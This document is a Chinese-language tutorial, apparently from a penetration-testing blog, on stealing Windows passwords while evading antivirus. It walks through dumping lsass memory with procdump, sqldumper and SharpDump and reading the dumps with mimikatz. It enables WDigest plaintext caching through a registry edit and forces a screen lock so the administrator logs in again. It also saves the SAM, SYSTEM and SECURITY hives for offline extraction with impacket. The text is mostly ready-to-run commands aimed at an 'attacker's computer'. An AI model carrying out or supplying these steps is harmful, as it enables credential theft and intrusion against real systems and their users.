目前大部分抓Windows密碼的工具都會被殺軟攔截，例如mimikatz，wce，pwdump等，下面介紹幾種具有一定免殺效果的抓密碼方式。

一、Procdump

Procdump是Windows工具包里的一款工具，由于有微軟的官方簽名，所以大部分殺軟不會查殺。
sysinternals工具包下載地址：
https://docs.microsoft.com/zh-cn/sysinternals/downloads/

1. 獲取內存文件lsass.exe

procdump64.exe -accepteula -ma lsass.exe lsass.dmp

2. 將lsass.dmp下載到攻擊者的電腦上
3. 使用本地的mimikatz.exe讀取lsass.dmp

mimikatz.exe "sekurlsa::minidump lsass.dmp" "sekurlsa::logonPasswords full" exit

image.png

二、SqlDumper

如果目標安裝了mssql，可以通過sqldumper.exe來dump lsass進程，沒安裝也可以手動上傳。
sqldumper的默認路徑：C:\Program Files\Microsoft SQL Server\110\Shared

1. 先找到lsass.exe的進程id

tasklist|findstr "lsass.exe"

2. 導出dmp文件

sqldumper.exe <pid> 0 0x01100

3. 將導出的SQLDmpr0001.mdmp下載到攻擊者的電腦上
4. 使用本地的mimikatz.exe進行讀取

 mimikatz.exe "sekurlsa::minidump SQLDmpr0001.mdmp" "sekurlsa::logonPasswords full" "exit"

image.png

三、SharpDump

體積小巧(不到10KB)，便于自己做免殺處理，下載地址：
https://github.com/GhostPack/SharpDump

1. 首先需要使用vs編譯成exe文件

image.png

2. 把lsass.exe進程數據導出來

C:\Users\Administrator\Desktop>SharpDump.exe

image.png

3. dump的文件是 bin 后綴，拖到本地機器上以后，先重命名為 zip 后綴，然后解壓
4. 使用本地的mimikatz進行讀取

mimikatz.exe "sekurlsa::minidump debug516" "sekurlsa::logonPasswords full" "exit"

image.png

四、Win10及2012以后的系統，如何抓取明文？

當系統為win10或2012以上時，默認在Wdigest內存中禁止保存明文密碼(hash可以抓到)，可以通過修改注冊表的方式進行繞過。

1. 修改注冊表

打開：
reg add HKLM\SYSTEM\CurrentControlSet\Control\SecurityProviders\WDigest /v UseLogonCredential /t REG_DWORD /d 1 /f
關閉：
reg add HKLMSYSTEMCurrentControlSetControlSecurityProvidersWDigest /v UseLogonCredential /t REG_DWORD /d 0 /f

2. 開啟 Wdigest Auth 后，需要重新登錄才能抓到明文，可以使用強制鎖屏的方式，讓管理員重新登錄。

rundll32 user32.dll,LockWorkStation

3. 登錄后，再使用Procdump獲取內存lsass.exe中的信息，就可以得到明文了。

說明：如果殺毒軟件有dump內存文件保護，則以上方式無法免殺。

補充：免殺抓hash

使用注冊表導出Hash，再通過impacket進行離線讀取，實戰中大部分殺軟都不會攔截。

reg save HKLM\SYSTEM sys.hiv
reg save HKLM\SAM sam.hiv
reg save hklm\security security.hiv
python secretsdump.py -sam sam.hiv -security security.hiv -system sys.hiv LOCAL

image.png